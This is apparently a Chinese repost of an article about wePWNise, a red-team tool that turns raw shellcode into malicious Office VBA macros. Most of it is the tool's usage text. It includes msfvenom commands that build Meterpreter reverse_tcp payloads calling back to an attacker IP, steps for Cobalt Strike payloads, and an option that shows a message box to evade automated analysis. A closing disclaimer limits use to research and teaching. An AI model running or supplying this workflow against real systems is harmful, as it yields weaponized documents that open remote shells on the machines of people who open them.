pip install termcolor
git clone https://github.com/FSecureLABS/wePWNise.git
usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]
[--out <output_file>] [--msgbox] [--msg <window_message>]
optional arguments:
-h, --help 显示工具帮助信息和退出
-i86 <x86_shellcode> 输入x86原始shellcode
-i64 <x64_shellcode> 输入x64原始shellcode
--inject64 注入64位Payload,注入x86时设置为False,默认为True
--out <output_file> 输出VBA宏的文件路径
--msgbox 显示消息框以防止自动化分析,默认为True
--msg <window_message> --msgbox设置为True时,需要显示的自定义提示消息
Metasploit Payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt
Cobalt Strike Payload
Attacks > Packages > Payload Generator
wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt
$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt
原文始发于微信公众号(FreeBuf):wePWNise:一款功能强大的红队Office宏VBA代码生成工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论